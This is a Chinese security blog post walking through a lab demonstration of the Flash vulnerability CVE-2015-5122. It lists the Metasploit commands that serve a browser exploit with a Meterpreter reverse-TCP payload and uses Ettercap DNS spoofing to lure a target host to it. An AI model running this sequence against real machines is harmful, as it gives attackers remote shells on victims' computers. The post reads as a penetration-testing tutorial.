酷帥王子'blog-思想激进者,一搞网络安全的市井小儿,随波逐流之辈也!

cve2015-5122漏洞实例演示虚拟机

2018-9-22 13:28 作者:酷帥王子 | 黑盒网络渗透测试 |

二、cve2015-5122漏洞实例演示虚拟机

  关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:

search cve-2015-5122如图:

 

下面我们敲如下命令:

use exploit/multi/browser/adobe_flash_opaque_background_uaf

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.0.109

set URIPATH /                        /*根目录*/

set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址

set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用

然后show options如图:

 

一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:

然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115

Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf

 

成功了,这时候我们断开ettercap,如图:

 

Screenshot如图:

 

文章作者:酷帥王子
文章地址:https://6kb.org:443/post-53.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

发表评论:



Powered by 酷帥王子

CopyRight © 2009-2016 酷帥王子'blog.  All rights reserved.